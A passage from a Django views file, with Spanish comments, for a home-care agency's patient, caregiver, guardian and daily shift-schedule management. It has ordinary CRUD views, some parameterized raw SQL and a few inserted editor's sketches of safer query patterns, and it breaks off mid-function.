\n\tcontext = {\n\t\t\"pacientes\":paciente,\n\t\t\"variable1\":variable1,\n\t\t\"falso_x\":falso_x,\n\t\t\"logo_pdf\":logo_pdf,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_pacientes.html',context)\n\n@login_required(login_url='login_ini')\ndef grid_param(request):\n\tvariable1 = 'Despliegue de Parametros del Sistema'\n\tparam = Param.objects.all().order_by('tipo','descrip')\n\tcontext = {\n\t\t\"param\":param,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_param.html',context)\n\n#busca cuidador\ndef grid_cuidadorBusca(request):\n\tvariable1 = 'Despliegue de Cuidadores'\n\tnuevo_cui = 0\n\tqueryset = request.GET.get('buscar').strip()\n\t#return HttpResponse(str(queryset))\n\tif queryset == '':\n\t\tcuidador = 
Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\telse:\n\t\tcuidador = Cuidadores.objects.filter(Q(nombre__icontains=queryset))\n\n\tcuenta = cuidador.count()\n\tcontext = {\n\t\t\"cuidadores\":cuidador,\n\t\t\"nuevo_cui\":nuevo_cui,\n\t\t\"cuenta\":cuenta,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_cuidadores.html',context)\n\ndef grid_pacienteBusca(request):\n\tvariable1 = 'Despliegue de Pacientes'\n\tqueryset = request.GET.get('buscar').strip()\n\tpaciente = Pacientes.objects.filter(Q(nombre__icontains=queryset))\n\tfalso_x = False\t# patient ENABLED / DISABLED flag\n\tcontext = {\n\t\t\"pacientes\":paciente,\n\t\t\"variable1\":variable1,\n\t\t\"falso_x\":falso_x,}\n\treturn render(request,'grid_pacientes.html',context)\n\n\ndef grid_paramBusca(request):\n\tvariable1 = 'Buscando Parametro'\n\tbuscar = request.GET.get('buscar').strip()\n\tcheck1 = request.GET.get('check1')\n\tparam = Param.objects.all().order_by('tipo','descrip')\n\tif buscar != \"\":\n\t\tif check1 is None:\n\t\t\tparam = Param.objects.filter(Q(tipo__icontains=buscar))\n\t\telse:\n\t\t\tparam = Param.objects.filter(Q(descrip__icontains=buscar))\n\tcontext = {\n\t\t\"param\":param,\n\t\t\"variable1\":variable1,\n\t\t\"buscar\":buscar,\n\t}\n\treturn render(request,'grid_param.html',context)\n\ndef ficha_cuidadores(request,id):\n\tvariable1 = 'Ficha del Cuidador'\n\tvariable2 = 'modifica_rut'\n\tobj = Cuidadores.objects.get(id=id)\n\trequest.session['id_x'] = id\t\t# set global session variable\n\tcontext = {\n\t\t\"rut\":obj.rut,\n\t\t\"nombre\":obj.nombre,\n\t\t\"direccion\":obj.direccion,\n\t\t\"fe_ini\":obj.fe_ini,\n\t\t\"fono_cuid\":obj.fono_cuid,\n\t\t\"fono2_cuid\":obj.fono2_cuid,\n\t\t\"fe_nac\":obj.fe_nac,\n\t\t\"variable1\":variable1,\n\t\t\"variable2\":variable2,}\n\treturn render(request,'ficha_cuidadores.html',context)\n\ndef ficha_apoderados(request,id):\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 'modifica_rut'\n\tobj = Apoderados.objects.get(id=id)\n\tcontext = {\n\t\t\"rut\":obj.rut,\n\t\t\"nombre\":obj.nombre,\n\t\t\"direccion\":obj.direccion,\n\t\t\"fe_ini\":obj.fe_ini,\n\t\t\"fono_apod\":obj.fono_apod,\n\t\t\"fono2_apod\":obj.fono2_apod,\n\t\t\"variable1\":variable1,\n\t\t\"variable2\":variable2,}\n\treturn render(request,'ficha_apoderados.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaCui(request,id):\n\tvariable1 = 'Eliminación de Cuidador desde la base de datos'\n\tsw1 = 'cui'\n\tform = Cuidadores.objects.get(id=id)\n\tdescrip = form.nombre\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\n\t\t# NOTE: the delete is disabled; confirming only redirects\n\t\t#form.delete()\n\t\treturn redirect('grid_cuidadores')\t# redirect to the URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaPac(request,id):\n\tvariable1 = 'Eliminación de Paciente desde la base de datos'\n\tsw1 = 'pac'\n\tform = Pacientes.objects.get(id=id)\n\tdescrip = form.nombre\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\n\t\tform.delete()\n\t\treturn redirect('grid_pacientes')\t# redirect to the URL\n\treturn 
render(request,'confirma_elimina.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaApod(request,id):\n\tvariable1 = 'Eliminacion de Apoderado o Institución'\n\tsw1 = 'apo'\n\tform = Apoderados.objects.get(id=id)\n\tdescrip = form.nombre\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\n\t\tform.delete()\n\t\treturn redirect('grid_apoderados')\t# redirect to the URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\ndef NuevoCui(request):\n\tvariable1 = 'Agregando nueva Ficha de Cuidador'\n\tvariable2 = \"modifica_rut\"\n\terror_new = \"ok\"\n\tnuevo_cui = 1\t# new record\n\tform = CuidadoresForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo')\t# employed vs. fee-based\n\tclasi = Param.objects.filter(tipo='CLASI').order_by('codigo')\n\tinstr\t= Param.objects.filter(tipo='INSTR').order_by('codigo')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'tipo':tipo,\n\t\t'clasi':clasi,\n\t\t'instr':instr,\n\t\t'ecivil':ecivil,\n\t\t'nuevo_cui':nuevo_cui,\n\t\t'error_new':error_new,\n\t\t}\n\tif request.method == \"POST\":\n\t\trut_x = request.POST.get('rut')\t# value from the template\n\t\texiste = Cuidadores.objects.filter(rut=rut_x).exists()\n\t\tif existe:\n\t\t\t# duplicate rut: flag the error and re-render the same context\n\t\t\tcontext['error_new'] = 'error1'\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('grid_cuidadores')\n\treturn render(request,'ficha_cuidadores.html',context)\n\n\ndef NuevoApod(request):\n\tvariable1 = 'Agregando nueva Ficha de Apoderado'\n\tvariable2 = \"modifica_rut\"\n\terror_new = \"ok\"\n\tform = ApoderadosForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'error_new':error_new,\n\t\t}\n\tif request.method == \"POST\":\n\t\trut_x = request.POST.get('rut')\t# value from the template\n\t\texiste = Apoderados.objects.filter(rut=rut_x).exists()\n\t\tif existe:\n\t\t\tcontext['error_new'] = 'error1'\t# duplicate rut\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('grid_apoderados')\n\treturn render(request,'ficha_apoderados.html',context)\n\n\ndef NuevoPac(request):\n\t# Sends the form with every field empty\n\tvariable1 = 'Agregando nueva Ficha de Paciente'\n\tvariable2 = \"modifica_rut\"\n\terror_new 
= \"ok\"\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_pac = 1\n\tform \t = PacientesForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo') # tipo de cobranza\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo') # particular - instit.\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # Efec,Cheq,Tarj\n\tyace = Param.objects.filter(tipo='YACE').order_by('-codigo') #Hosp.Domici.Cli\n\tecivil\t = Param.objects.filter(tipo='ECIVI')\n\tprevi\t = Param.objects.filter(tipo='PREVI')\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'cob':cob,\n\t\t'clasi':clasi,\n\t\t'abon':abon,\n\t\t'error_new':error_new,\n\t\t'yace':yace,\n\t\t'nuevo_pac':nuevo_pac,\n\t\t'car_doc_cobro':\"3\",\n\t\t'previ':previ,\n\t\t'ecivil':ecivil,\n\t\t}\n\n\t#return HttpResponse(str(ecivil))\n\n\tif request.method == \"POST\":\n\t\tpaciente = Pacientes # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\tnombre_x = request.POST.get('nombre') # valor del template\n\t\t#fe_ini = request.POST.get('fe_ini') # valor del template\n\t\tfechahoy = datetime.now() \n\t\tano_hoy = fechahoy.year\n\t\tmes_hoy = fechahoy.month\n\t\texiste = paciente.objects.filter(rut=rut_x).exists()\n\t\tif existe == True:\n\t\t\terror_new = 'error1'\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'region':region,\n\t\t\t\t'comuna':comuna,\n\t\t\t\t'sexo':sexo,\n\t\t\t\t'cob':cob,\n\t\t\t\t'clasi':clasi,\n\t\t\t\t'abon':abon,\n\t\t\t\t'error_new':error_new,\n\t\t\t\t'yace':yace,\n\t\t\t\t'rut_x':rut_x,\n\t\t\t\t'ecivil':ecivil,}\t\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\t#saldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py 11-04-2020\n\t\t\t\t#return HttpResponse(saldo_ant)\n\t\t\t\t#if saldo_ant > 0:\t# 11-04-2020\n\t\t\t\t#\terror3 = '1'\t# 11-04-2020\n\t\t\t\tpaciente = Pacientes # modelo\n\t\t\t\tform.save()\n\t\t\t\t# Crea un registro en tabla SALDOS (misfunciones.py)\n\t\t\t\tgrabasaldo(nombre_x,rut_x,0,mes_hoy,ano_hoy) \n\t\t\t\treturn redirect('grid_pacientes')\n\treturn render(request,'ficha_pacientes.html',context)\n\n\n@login_required(login_url='login_ini')\ndef ActualizaCui(request,id):\n\tvariable1 = 'Modifica Cuidador existente'\n\tnuevo_cui = 0\n\tvariable2 = 'nomodifica_rut'\n\tcuidador = Cuidadores.objects.get(id=id)\n\trequest.session['id_x'] = id \t# define variable gobal\n\tform = CuidadoresForm(request.POST or None, request.FILES or None,instance=cuidador)\n\t#form = CuidadoresForm(request.POST, request.FILES or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo') #tipo contrato\n\tclasi =\t Param.objects.filter(tipo='CLASI').order_by('codigo') #Superior-interm.-stand\n\tinstr\t = Param.objects.filter(tipo='INSTR').order_by('codigo') # nivel educ.\n\tecivil\t = Param.objects.filter(tipo='ECIVI')\n\tvar_region = cuidador.region # entrega valor del registro Cuidadores\n\tvar_comuna = cuidador.comuna # 
\n\tif request.method == \"POST\":\n\t\telim_foto_x = request.POST.get('elim_foto')\n\t\tif elim_foto_x == '0':\t# delete the photo\n\t\t\t# NOTE: this path is resolved relative to the process working directory\n\t\t\tif os.path.exists(\"/static/img/\"+cuidador.rut+\".jpg\"):\n\t\t\t\tremove(\"/static/img/\"+cuidador.rut+\".jpg\")\n\n\t\tif form.is_valid():\n\t\t\tcuidador.media = \"\"\n\t\t\tform.save()\n\t\t\treturn redirect('grid_cuidadores')\n\n\t# on an invalid POST the bound form is discarded and the stored record re-shown\n\tform = CuidadoresForm(instance=cuidador)\n\t# current values of the Cuidadores record, for the template combos\n\tvar_sex = cuidador.sexo\n\tvar_region = cuidador.region\n\tvar_comuna = cuidador.comuna\n\tvar_tip = cuidador.tipo\n\tvar_clasi = cuidador.clasi\n\tvar_instr = cuidador.instr\t# education level\n\tvar_ecivil = cuidador.ecivil\t# marital status\n\tfotito = \"/static/img/\"+cuidador.rut+\".jpg\"\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"variable2\":variable2,\n\t\t\"form\":form,\n\t\t\"sexo\":sexo,\n\t\t\"region\":region,\n\t\t\"comuna\":comuna,\n\t\t\"clasi\":clasi,\n\t\t\"tipo\":tipo,\n\t\t\"instr\":instr,\n\t\t\"ecivil\":ecivil,\n\t\t\"fotito\":fotito,\n\t\t\"id_x\":id,\n\t\t\"var_sex\":var_sex,\n\t\t\"var_region\":var_region,\n\t\t\"var_comuna\":var_comuna,\n\t\t\"var_tip\":var_tip,\n\t\t\"var_clasi\":var_clasi,\n\t\t\"var_instr\":var_instr,\n\t\t\"var_ecivil\":var_ecivil,\n\t\t\"nuevo_cui\":nuevo_cui,\n\t\t}\n\treturn render(request,'ficha_cuidadores.html',context)\n\n\n@login_required(login_url='login_ini')\ndef ActualizaApod(request,id):\n\tvariable1 = 'Modifica Apoderado existente'\n\tvariable2 = 'nomodifica_rut'\n\tapoderado = Apoderados.objects.get(id=id)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tif request.method == \"POST\":\n\t\tform = ApoderadosForm(request.POST,instance=apoderado)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_apoderados')\n\t\telse:\n\t\t\t# update failed: rebuild the form and fall through to the render below\n\t\t\tform = ApoderadosForm(instance=apoderado)\n\telse:\n\t\tform = ApoderadosForm(instance=apoderado)\t# loads the full record\n\tvar_region = apoderado.region\t# current field values\n\tvar_comuna = apoderado.comuna\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"variable2\":variable2,\n\t\t\"form\":form,\n\t\t\"region\":region,\n\t\t\"comuna\":comuna,\n\t\t\"id_x\":id,\n\t\t\"var_region\":var_region,\n\t\t\"var_comuna\":var_comuna,\n\t\t}\n\treturn render(request,'ficha_apoderados.html',context)\n
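\n\n# --- Editor's sketch (hypothetical, not wired into the URLs) ---\n# The detail views above fetch rows with Model.objects.get(id=id), which raises\n# DoesNotExist (an HTTP 500) for a bad id. get_object_or_404 is already imported\n# at the top of this module; a variant of ficha_apoderados using it would look\n# like this. ficha_apoderados_404 is an invented name and the context is abridged.\ndef ficha_apoderados_404(request, id):\n\tobj = get_object_or_404(Apoderados, id=id)\t# 404 instead of 500 on a bad id\n\tcontext = {\n\t\t\"rut\": obj.rut,\n\t\t\"nombre\": obj.nombre,\n\t\t\"variable1\": 'Ficha de Apoderado',\n\t}\n\treturn render(request, 'ficha_apoderados.html', context)\n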
\n\n@login_required(login_url='login_ini')\ndef ActualizaPac(request,id):\n\tfechahoy = datetime.now()\n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\tnuevo_pac = 0\n\t#\n\terror1 = \"ok\"\t# flags a duplicate patient rut\n\tvariable1 = 'Modifica Paciente Existente'\n\tvariable2 = ''\n\tpaciente = Pacientes.objects.get(id=id)\t# row in the table\n\n\t# Determine the INITIAL deposit amount\n\tvalor_abono = 0\n\tif paciente.fe_ini is not None:\n\t\tfe_i = str(paciente.fe_ini)[0:10]\t# yields 'YYYY-MM-DD', patient start date\n\t\tfe_f = str(fechahoy)[0:10]\t\t# yields 'YYYY-MM-DD', current date\n\t\texiste = Anticipos.objects.filter(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe:\n\t\t\tanticipo = Anticipos.objects.get(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = anticipo.valor\n\n\t# Clear the aux table and store this patient's record there, for ANTICIPOS and friends\n\tusername_y = request.session.get('username_x')\t# saved by the plantilla_base view\n\n\trequest.session['rut_x'] = paciente.rut\t# initialise global session variable\n\n\tPacientes_aux.objects.all().delete()\t# clear the table\n\tcursor = connection.cursor()\t# requires: from django.db import connection\n\n\tcursor.execute(\"insert into ai_pacientes_aux (rut,nombre,rut_apod,fe_ini,comuna_apod,mes,ano,username)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[paciente.rut,paciente.nombre,paciente.rut_apod,paciente.fe_ini,paciente.comuna_apod,mes_hoy,ano_hoy,str(username_y)])\n\n\t#\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\n\tprevi\t= Param.objects.filter(tipo='PREVI')\n\t#\n\tif request.method == 'POST':\n\t\tform = PacientesForm(request.POST,instance=paciente)\t# record bound to the form\n\t\tif form.is_valid():\n\t\t\tif paciente.fe_alta is not None:\n\t\t\t\tpaciente.estado = '1'\n\t\t\t\tpaciente.fe_ini = None\t# empty date\n\t\t\tform.save()\n\t\t\treturn redirect('grid_pacientes')\n\n\t# Render the template for editing\n\tform = PacientesForm(instance=paciente)\t# loads the full record\n\tvar_fe_ini = paciente.fe_ini\n\tvar_region = paciente.region\t# current field values for the combos\n\tvar_comuna = paciente.comuna\n\tvar_comunapod = paciente.comuna_apod\t# guardian's or institution's comuna\n\tchek_x = paciente.estado\n\tvar_sex = paciente.sexo\n\tvar_cob = paciente.cob\t# billing type\n\tvar_clasi = paciente.clasi\n\tvar_abon = paciente.abon\n\tvar_yace = paciente.yace\t# hospital / home / clinic / MaAyuda\n\tvar_doc_cobro = paciente.doc_cobro\n\trut_anticipo = paciente.rut\n\trut_x = paciente.rut\n\tvar_ecivil = paciente.ecivil\n\tvar_previ = paciente.previ\n\n\tsw = 2\n\tcontext = 
{\n\t\t\t\"variable1\":variable1,\n\t\t\t\"variable2\":variable2,\n\t\t\t\"form\":form,\n\t\t\t\"sexo\":sexo,\n\t\t\t\"region\":region,\n\t\t\t\"comuna\":comuna,\n\t\t\t\"ecivil\":ecivil,\n\t\t\t\"previ\":previ,\n\t\t\t\"yace\":yace,\n\t\t\t\"cob\":cob,\n\t\t\t\"clasi\":clasi,\n\t\t\t\"abon\":abon,\n\t\t\t\"var_sex\":var_sex,\n\t\t\t\"var_region\":var_region,\n\t\t\t\"var_comuna\":var_comuna,\n\t\t\t\"var_comunapod\":var_comunapod,\n\t\t\t\"var_cob\":var_cob,\n\t\t\t\"var_clasi\":var_clasi,\n\t\t\t\"var_abon\":var_abon,\n\t\t\t\"var_yace\":var_yace,\n\t\t\t\"rut_anticipo\":rut_anticipo,\n\t\t\t\"var_doc_cobro\":var_doc_cobro,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"rut_x\":rut_x,\n\t\t\t\"sw\":sw,\n\t\t\t\"nuevo_pac\":nuevo_pac,\n\t\t\t\"valor_abono\":valor_abono,\n\t\t\t\"var_ecivil\":var_ecivil,\t\t\t\n\t\t\t\"var_previ\":var_previ,\t\t\t\n\t\t\t\"id\":id, }\n\treturn render(request,'ficha_pacientes.html',context)\n\n\ndef MenuParam(request):\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tcontext ={ \"variable1\":variable1,\"logo_corp\":logo,}\n\treturn render(request,'menuparametros.html',context)\n\n\ndef FichaParam(request,id):\n\tvariable1 = 'Modificando Parametros del Sistema'\n\tparam = Param.objects.get(id=id)\n\t#BOTON ACEPTAR en el template\n\tif request.method == \"POST\":\n\t\tform = ParamForm(request.POST,instance=param)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_param')\n\t\telse:\n\t\t\t#falló la actualizacion\n\t\t\tform = ParamForm(instance = param)\n\t\t\tcontext = {\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"form\":form,\n\t\t\t\t\"id_x\":id,\n\t\t\t}\n\t\t\trender(request,'ficha_param.html',context)\n\telse:\n\t\t# x GET - puebla el template.\n\t\tform = ParamForm(instance=param) # trae el formulario completo\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"form\":form,\n\t\t\t\"id_x\":id,\n\t\t\t}\n\treturn render(request,'ficha_param.html',context)\n\ndef no_esta(rut_x,lista):\n if rut_x in lista:\n return False\n return True\n\n# LLAMADA DESDE PRINCIPAL.HTML \n@login_required(login_url='login_ini')\ndef grid_pauta(request):\n\tvariable1 = 'Pauta Diaria'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day \n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\tfecha = str(ano_hoy)+\"-\"+str(mes_hoy).zfill(2)+\"-\"+str(dia_hoy).zfill(2) + \" 00:00:00\"\n\tsql_pauta = \"select * from ai_pauta where fecha='%s'\" %fecha\n\tpauta = User.objects.raw(sql_pauta)\n\t#\t \n\tdias = []\t# llena este arreglo\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\n\t# define 3 años para atras + uno adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\tcuenta = 0\n\tfor ss in pauta:\n\t\tcuenta = cuenta + 1\n\n\tpauta.fecha = fecha\t\n\n\tcontext = {\n\t\t\"pauta\":pauta,\n\t\t\"variable1\":variable1,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"dias\":dias,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"mes_numerico\":mes_numerico,}\n\treturn 
render(request,'grid_pauta.html',context)\n\n\n# BUSCA/CONSTRUYE button\ndef grid_pautaBusca(request):\n\tvariable1 = 'Pauta Diaria'\n\terror1 = \"no_hayerror\"\n\tbuscar = request.GET.get('buscar').strip()\t# from the template via method='GET'\n\tdia_x = request.GET.get('dias')\n\tmes_x = request.GET.get('meses')\n\tano_x = request.GET.get('ano')\n\t#\n\tfechahoy = datetime.now()\n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\tdias = list(range(1, 32))\t# day numbers 1..31\n\n\t# array indices start at zero\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\t# three years back plus one ahead\n\tano = [ano_hoy - 2, ano_hoy - 1, ano_hoy, ano_hoy + 1]\n\n\t# If the last day of the month was chosen, verify it really exists.\n\ttotdias = calendar.monthrange(int(ano_x),meses.index(mes_x) + 1)[1]\t# total days in the month\n\tif int(dia_x) > totdias:\n\t\terror1 = \"hay_error\"\n\t\tmes_hoy = mes_x\t# as a word\n\t\tdia_hoy = int(dia_x)\n\t\tano_hoy = int(ano_x)\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"dias\":dias,\n\t\t\t\"meses\":meses,\n\t\t\t\"ano\":ano,\n\t\t\t\"dia_hoy\":dia_hoy,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"cuenta\":0,\n\t\t\t\"error1\":error1,}\n\t\treturn render(request,'grid_pauta.html',context)\n\n\t# prepare the search\n\tdia_z = str(dia_x).zfill(2)\t# to string, left-padded with zeros\n\tmes_z = meses.index(mes_x) + 1\t# numeric month\n\tmes_z = str(mes_z).zfill(2)\n\tfecha = str(ano_x)+\"-\"+mes_z+\"-\"+dia_z+\" 00:00:00\"\n\n\t# Everyone admitted up to that date and still active (estado='0').\n\tpaciente = Pacientes.objects.filter(fe_ini__range=('1900-01-01', fecha),estado='0')\n\n\tif buscar == '':\n\t\tpauta = Pauta.objects.raw(\"select * from ai_pauta where fecha=%s\", [fecha])\n\telse:\n\t\t# parameterized LIKE: the search text must not be concatenated into the SQL\n\t\tpauta = Pauta.objects.raw(\"select * from ai_pauta where paciente like %s and fecha = %s\",\n\t\t\t['%'+buscar+'%', fecha])\n\tcuenta = sum(1 for _ in pauta)\n\n\t# collect the RUTs already present in the pauta\n\taPauta = []\n\tfor j in pauta:\n\t\taPauta.append(j.rut)\n\n\tif buscar == '':\n\t\t# insert the missing rows into ai_pauta\n\t\tcursor = connection.cursor()\t# requires: from django.db import connection\n\t\tfor k in paciente:\n\t\t\tif k.rut not in aPauta:\n\t\t\t\tcursor.execute(\"insert into ai_pauta (rut,paciente,fecha,tipo_turno1,tipo_turno2,tipo_turno3) \"\n\t\t\t\t\"values(%s,%s,%s,%s,%s ,%s)\",[k.rut,k.nombre,fecha,'0','0','0'])\n\n\t\tpauta = Pauta.objects.raw(\"select * from ai_pauta where fecha=%s\", [fecha])\n\t\tcuenta = sum(1 for _ in pauta)\t# number of patients for this search\n\n\t# numeric, as the combo-box in grid_pauta requires\n\tdia_hoy = int(dia_x)\n\tmes_hoy = mes_x\n\n\tcontext = {\n\t\t\"pauta\":pauta,\n\t\t\"variable1\":variable1,\n\t\t\"dias\":dias,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"error1\":error1,}\n\treturn render(request,'grid_pauta.html',context)\n
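\n\n# --- Editor's sketch (hypothetical, untested) ---\n# The raw SQL above maps 1:1 onto the Pauta model, so the same lookups can be\n# expressed with the ORM, which parameterises values automatically. buscar_pauta\n# is an invented name; the field names (fecha, paciente) come from the queries above.\ndef buscar_pauta(fecha, buscar=''):\n\tqs = Pauta.objects.filter(fecha=fecha)\n\tif buscar:\n\t\tqs = qs.filter(paciente__icontains=buscar)\t# LIKE '%buscar%', escaped by the ORM\n\treturn qs\n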
{\n\t\t\"pauta\":pauta,\n\t\t\"variable1\":variable1,\n\t\t\"dias\":dias,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"error1\":error1,}\n\treturn render(request,'grid_pauta.html',context)\n\n\n# ACTUALIZA FICHA DE PAUTA\n@login_required(login_url='login_ini')\ndef ActualizaPauta(request,id, fecha):\n\terror1= \"ok\"\t# 11-06-2020\n\tvariable1 = 'Definiendo / Actualizando Pauta'\n\ttipo_turno = ['-No asignado','Contratado','Extra']\n\taReca_apod = ['----','Normal','Domingo','Festivo']\n\tpauta = Pauta.objects.get(id=id)\t# registro en tabla\n\tform \t= PautaForm(request.POST,instance=pauta) # reg. en formulario HTML\n\t#\n\tturno1\t= Cuidadores.objects.all().order_by('nombre')\n\tturno2 \t= Cuidadores.objects.all().order_by('nombre')\n\tturno3 \t= Cuidadores.objects.all().order_by('nombre')\n\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('descrip')\n\trut_ = pauta.rut # rut paciente, registro en tabla\n\tpaciente = Pacientes.objects.filter(rut=rut_) # solo el paciente del RUT\n\t\n\tnapod = \" Sin nombre\"\n\tfor apod in paciente:\n\t\tnapod = apod.n_apod\n\t\tvalorp1 = apod.valor_t1\t# pago del paciente\t\n\t\tvalorp2 = apod.valor_t2\t# pago del paciente\n\t\tvalorp3 = apod.valor_t3\t# pago del paciente\n\n\tvar_rutcui1 = pauta.rut_t1\n\tvar_rutcui2 = pauta.rut_t2\n\tvar_rutcui3 = pauta.rut_t3\n\t#\n\tif request.method == 'POST':\n\t\tif (form.is_valid()):\n\t\t\trut_t1 = request.POST.get('rut_t1') # contenido del template PAUTA\n\t\t\trut_t2 = request.POST.get('rut_t2') # contenido template \n\t\t\trut_t3 = request.POST.get('rut_t3') # contenido template \n\t\t\t#\n\t\t\ttipo_turno1 = request.POST.get('tipo_turno1')\n\t\t\ttipo_turno2 = request.POST.get('tipo_turno2')\n\t\t\ttipo_turno3 = request.POST.get('tipo_turno3')\n\n\t\t\tpauta.tipo_turno1 = tipo_turno1 # contratado - extra\n\t\t\tpauta.tipo_turno2 = tipo_turno2 # es tipo caracter\n\t\t\tpauta.tipo_turno3 = tipo_turno3 # es 